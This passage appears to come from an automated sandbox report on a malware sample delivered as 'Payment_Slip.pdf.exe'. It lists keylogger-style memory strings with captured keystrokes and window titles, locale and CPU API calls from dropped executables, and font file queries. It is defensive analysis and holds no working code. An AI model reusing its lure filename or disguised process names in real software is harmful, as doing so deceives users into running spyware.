Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>LR
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br>
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br>t-
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<LR
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br><font color="#00b1ba"><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>rTH
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr	Binary or memory string: [Program Manager]
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQz(
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br>t-
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}TH

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004329DA cpuid

11_2_004329DA

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: EnumSystemLocalesW,	11_2_0044F17B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: EnumSystemLocalesW,	11_2_0044F130
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: EnumSystemLocalesW,	11_2_0044F216
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoA,	11_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoW,	11_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_0044F61C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoW,	11_2_0044F723
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: EnumSystemLocalesW,	11_2_00445914
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetLocaleInfoW,	11_2_00445E1C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_0044EEB8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: EnumSystemLocalesW,	17_2_0044F17B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: EnumSystemLocalesW,	17_2_0044F130
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: EnumSystemLocalesW,	17_2_0044F216
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044F2A3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoA,	17_2_0040E2BB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoW,	17_2_0044F4F3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0044F61C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoW,	17_2_0044F723
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044F7F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: EnumSystemLocalesW,	17_2_00445914
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetLocaleInfoW,	17_2_00445E1C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0044EEB8

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Users\user\Desktop\Payment_Slip.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
